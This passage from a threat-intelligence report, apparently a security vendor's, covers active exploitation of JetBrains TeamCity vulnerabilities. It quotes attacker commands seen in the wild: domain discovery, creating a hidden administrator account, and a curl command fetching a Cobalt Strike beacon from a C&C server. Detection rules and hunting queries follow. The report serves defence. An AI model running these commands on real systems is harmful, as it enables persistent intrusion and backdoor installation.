[ad_1]
Executing domain discovery and persistence commands
Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe process under a vulnerable TeamCity server directory.
Parent Process:
C:\TeamCity\jre\bin\java.exe
We observed the following subject processes being used for discovery and persistence tactics:
- C:\WINDOWS\system32\naet.exe group /domain
- C:\WINDOWS\system32\naet1.exe localgroup Administratoren /add Default$
- C:\WINDOWS\system32\naet1.exe localgroup Administrators /add Default$
- C:\WINDOWS\system32\naet1.exe user /add Default$ GH{redacted}23gwg
- C:\WINDOWS\system32\naet1.exe user /del defaultuser0
- C:\WINDOWS\system32\naet1.exe user /domain
- C:\WINDOWS\system32\naet1.exe user administrator
- C:\WINDOWS\system32\naet1.exe user default$
- C:\WINDOWS\system32\nltest.exe /domain_trusts
Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorised access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.
Deploying Cobalt Strike beacons
Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.
The beacon was downloaded using the command curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o.conf and was saved in the path C:\TeamCity\bin\.conf.
This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.
Conclusion
The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organisations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.
This malicious activity not only jeopardises the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organisations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.
The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.
- 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
- 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability
- 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
- 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)
- 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
- 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)
Description | Trend Vision One Query |
---|---|
Jasmin ransomware file encryption event | eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc |
Service Installation of the Monero miner’s dropped Kernel driver as seen from the registry | eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys |
Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe | eventSubId:2 and processcmd:IndexStore.bat and objectcmd:(“certutil” and “decode”) |
Execution of the SparkRAT malware from the batch file | eventSubId:2 and processFilePath:cmd.exe and processcmd:win.bat and objectcmd:windowDefenSrv |
Detection of suspicious process invocations from a TeamCity process | eventSubId:2 AND processcmd:TeamCity AND objectcmd:(“powershell” OR “net” OR “nltest” OR “msiexec”) |
[ad_2]